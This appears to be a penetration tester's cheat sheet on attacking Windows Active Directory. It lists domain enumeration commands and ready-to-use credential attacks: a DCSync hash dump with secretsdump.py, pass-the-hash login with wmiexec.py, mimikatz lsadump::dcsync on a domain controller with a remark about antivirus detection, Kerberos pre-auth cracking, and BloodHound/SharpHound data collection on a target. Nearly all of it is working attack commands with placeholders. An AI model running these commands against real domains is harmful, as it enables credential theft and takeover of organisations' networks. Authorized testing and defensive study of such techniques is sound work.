Active Directoy
Active Directory is a directory service developed by Microsoft for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services. Initially, Active Directory was only in charge of centralized domain management.
-- Wikipedia
Related
Target
Domain Admins group
Domain Controller
General
Display permissions using PowerShell
dsacls "DC=<domain>,DC=<domain>"
net
List local accounts
net user
List domain accounts
net user /domain
Details about specific user
net user <user> /domain
List domain groups
net group /domain
Show domain's account policy
net accounts
DC sync attack
DC Sync Attacks With Secretsdump.py - YouTube
secretsdump.py <domain>/<user>:<pw>@<ip>
wmiexec.py <domain>/<user>@<ip> -hashes "<hash>"
Alternative approach (probably gets flagged by AV)
Copy & execute mimikatz.exe
on DC
lsadump::dcsync
Pre-Auth attack
Getting Passwords When Kerberos Pre-Auth IS Enabled - YouTube 1. sniff KRB auth packet 2. crack using hashcat
-> If no pre auth is required, just use Impacket to pull hashes from AD.
BloodHound
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. GitHub - BloodHoundAD/BloodHound
Gather information (on target)
pip3 install bloodhound
bloodhound-python -u <username> -p <password> -ns <nameserver> -d <domain> -c All
OR
.\SharpHound.exe -c all -d <domain> --domaincontroller <dc-ip>
Copy generated *BloodHound.zip
OR
SharpHound.ps1
Invoke-BloodHound -Domain <domain> -LDAPUser <user> -LDAPPass <pass> -CollectionMethod All -DomainController <dc-ip>
Analyze data (on kali)
neo4j console
bloodhound
Connect to database
bolt://localhost:7687
neo4j
<PW>
Import data
Upload Data
select .csv
, .json
or .zip
file(s)
Last updated